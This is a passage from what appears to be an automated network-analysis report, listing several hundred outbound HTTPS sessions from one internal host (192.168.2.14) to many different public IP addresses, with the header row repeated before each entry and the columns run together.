                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16084192.168.2.144706652.249.13.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16085192.168.2.1433640168.220.172.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16086192.168.2.143575879.91.79.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16087192.168.2.1451616156.23.251.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16088192.168.2.1439708187.122.12.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16089192.168.2.1448522152.121.175.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16090192.168.2.144988286.154.72.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16091192.168.2.1433162202.12.237.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16092192.168.2.1458784145.62.217.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16093192.168.2.145429074.79.171.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16094192.168.2.145201697.140.16.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16095192.168.2.144904046.25.38.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16096192.168.2.1444314135.13.52.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16097192.168.2.1450510213.188.80.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16098192.168.2.1448312161.235.2.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16099192.168.2.1437276143.73.107.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16100192.168.2.1459190100.233.186.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16101192.168.2.1449986207.113.192.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16102192.168.2.1443310160.248.189.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16103192.168.2.1448518206.3.47.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16104192.168.2.1457448107.255.83.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16105192.168.2.1433312187.247.15.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16106192.168.2.144215849.150.17.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16107192.168.2.145148049.74.103.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16108192.168.2.1444796191.233.15.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16109192.168.2.1452486133.44.18.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16110192.168.2.144928886.123.173.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16111192.168.2.1445134136.193.187.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16112192.168.2.1454374116.174.19.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16113192.168.2.144591412.87.216.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16114192.168.2.1449850216.105.164.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16115192.168.2.1457078140.157.87.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16116192.168.2.143437682.182.41.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16117192.168.2.14458689.31.90.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16118192.168.2.144760834.122.32.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16119192.168.2.1432936105.137.38.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16120192.168.2.1434634136.206.167.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16121192.168.2.1449596171.178.101.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16122192.168.2.1444446186.34.27.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16123192.168.2.144157059.132.251.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16124192.168.2.145189286.219.75.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16125192.168.2.145351684.113.70.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16126192.168.2.1436002212.186.68.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16127192.168.2.146000224.21.20.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16128192.168.2.1438684136.56.185.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16129192.168.2.143277045.157.179.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16130192.168.2.1459158213.74.23.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16131192.168.2.1442438120.108.211.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16132192.168.2.1440422112.77.230.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16133192.168.2.144635276.186.110.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16134192.168.2.1456034138.94.37.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16135192.168.2.1439414164.37.88.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16136192.168.2.1451852169.84.154.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16137192.168.2.1455530178.147.244.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16138192.168.2.1440150170.7.125.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16139192.168.2.1452296122.115.144.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16140192.168.2.1437316109.237.115.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16141192.168.2.1449290186.19.202.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16142192.168.2.145589098.0.146.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16143192.168.2.1448494159.138.95.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16144192.168.2.145463053.183.111.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16145192.168.2.1436362181.98.73.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16146192.168.2.1451722149.81.13.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16147192.168.2.145411637.186.107.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16148192.168.2.1458264138.190.79.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16149192.168.2.144753090.30.76.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16150192.168.2.1438314140.12.2.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16151192.168.2.1442978161.232.177.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16152192.168.2.144677483.12.10.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16153192.168.2.1433392139.200.197.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16154192.168.2.145193079.168.237.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16155192.168.2.145888896.55.6.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16156192.168.2.1451458115.127.228.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16157192.168.2.1454810108.245.140.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16158192.168.2.1448112208.119.12.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16159192.168.2.1447226203.50.100.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16160192.168.2.1460400220.40.141.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16161192.168.2.1447012125.110.39.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16162192.168.2.1436558172.198.143.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16163192.168.2.1455304151.231.225.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16164192.168.2.1441666220.180.240.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16165192.168.2.14416849.72.249.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16166192.168.2.1442608163.220.4.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16167192.168.2.1441656142.160.83.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16168192.168.2.1460888161.121.72.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16169192.168.2.1459318132.43.21.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16170192.168.2.145124692.149.116.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16171192.168.2.1435406135.89.241.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16172192.168.2.143394061.192.22.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16173192.168.2.1443740193.38.98.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16174192.168.2.1434834125.34.73.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16175192.168.2.145886879.245.176.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16176192.168.2.146029861.158.141.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16177192.168.2.1436232208.188.77.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16178192.168.2.1457606169.74.55.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16179192.168.2.1443348161.172.248.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16180192.168.2.146030484.236.201.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16181192.168.2.1459906118.162.49.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16182192.168.2.145629035.72.4.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16183192.168.2.145635494.87.213.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16184192.168.2.1456960220.78.46.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16185192.168.2.1452544210.157.147.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16186192.168.2.145322080.208.36.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16187192.168.2.144859258.196.176.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16188192.168.2.1454788218.120.50.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16189192.168.2.1455310132.29.44.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16190192.168.2.1457622181.39.33.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16191192.168.2.145132269.181.143.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16192192.168.2.143302494.41.48.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16193192.168.2.1438230123.67.169.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16194192.168.2.145096863.201.230.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16195192.168.2.1460068140.171.7.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16196192.168.2.145927847.208.83.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16197192.168.2.1447332108.169.224.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16198192.168.2.1456534205.166.98.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16199192.168.2.144325275.116.93.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16200192.168.2.1439312177.125.146.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16201192.168.2.1437540187.137.15.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16202192.168.2.1438622207.52.156.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16203192.168.2.1448750126.80.19.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16204192.168.2.144148258.176.236.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16205192.168.2.1443762111.132.91.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16206192.168.2.143829458.107.87.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16207192.168.2.144346438.202.118.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16208192.168.2.145656644.98.197.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16209192.168.2.145768647.40.169.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16210192.168.2.144779488.238.57.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16211192.168.2.144181057.163.149.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16212192.168.2.1439424182.119.211.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16213192.168.2.144307293.78.144.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16214192.168.2.1433756132.48.155.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16215192.168.2.1439538151.98.119.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16216192.168.2.1438868111.167.211.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16217192.168.2.144439486.103.251.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16218192.168.2.1434016204.86.135.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16219192.168.2.143820485.97.220.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16220192.168.2.145234225.182.57.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16221192.168.2.143819044.186.15.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16222192.168.2.1444452175.113.81.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16223192.168.2.145464664.151.215.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16224192.168.2.143368250.211.41.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16225192.168.2.144062220.2.90.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16226192.168.2.1449764166.144.147.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16227192.168.2.144634286.160.249.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16228192.168.2.1441398136.200.90.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16229192.168.2.144789099.65.67.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16230192.168.2.144475419.29.17.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16231192.168.2.1453262145.55.172.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16232192.168.2.1458680154.134.168.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16233192.168.2.1453768197.124.210.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16234192.168.2.1456148184.164.142.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16235192.168.2.144407453.38.236.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16236192.168.2.143981881.142.203.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16237192.168.2.14460368.8.194.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16238192.168.2.1457474223.13.158.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16239192.168.2.145090278.169.233.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16240192.168.2.1447560164.149.66.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16241192.168.2.1452718181.51.249.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16242192.168.2.1449082183.192.234.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16243192.168.2.1448324131.238.52.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16244192.168.2.1448270191.87.48.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16245192.168.2.145215464.12.116.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16246192.168.2.144174017.182.161.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16247192.168.2.145968895.113.235.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16248192.168.2.1448928146.6.44.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16249192.168.2.145950023.152.160.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16250192.168.2.1459368216.164.183.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16251192.168.2.14559664.15.148.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16252192.168.2.1445066184.216.56.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16253192.168.2.1449942126.145.143.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16254192.168.2.143394058.3.171.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16255192.168.2.1444450101.39.132.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16256192.168.2.1450280186.185.28.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16257192.168.2.1449996117.35.250.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16258192.168.2.1444018136.161.234.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16259192.168.2.1441028103.247.137.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16260192.168.2.1446582172.139.104.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16261192.168.2.1456632162.205.50.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16262192.168.2.1453060121.110.72.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16263192.168.2.1445090167.215.137.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16264192.168.2.145396698.89.117.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16265192.168.2.14497409.205.69.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16266192.168.2.1437826194.192.55.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16267192.168.2.144976663.231.37.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16268192.168.2.1434294174.78.202.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16269192.168.2.1444248150.22.105.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16270192.168.2.146003059.62.152.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16271192.168.2.1442636113.247.133.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16272192.168.2.1443928104.61.180.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16273192.168.2.143915095.129.21.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16274192.168.2.143363466.78.149.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16275192.168.2.144282683.138.211.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16276192.168.2.1446994206.95.156.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16277192.168.2.1446754103.166.134.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16278192.168.2.146017042.246.128.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16279192.168.2.1459300110.131.153.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16280192.168.2.1455418146.208.196.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16281192.168.2.144192077.226.215.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16282192.168.2.144958073.65.86.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16283192.168.2.145301220.95.13.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16284192.168.2.1458956216.14.64.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16285192.168.2.144082492.152.237.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16286192.168.2.144829842.166.106.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16287192.168.2.1456282145.27.65.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16288192.168.2.145630649.98.68.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16289192.168.2.1438368159.122.164.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16290192.168.2.1438504163.213.171.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16291192.168.2.1444874128.201.135.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16292192.168.2.1460210159.220.32.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16293192.168.2.1442566178.16.87.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16294192.168.2.146011252.57.240.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16295192.168.2.144167212.198.49.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16296192.168.2.1438154110.61.113.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16297192.168.2.144217442.150.82.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16298192.168.2.14548441.165.134.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16299192.168.2.145194660.23.207.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16300192.168.2.143372689.84.22.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16301192.168.2.1436070180.25.215.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16302192.168.2.143988432.160.155.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16303192.168.2.1457668165.140.209.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16304192.168.2.1440678148.196.215.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
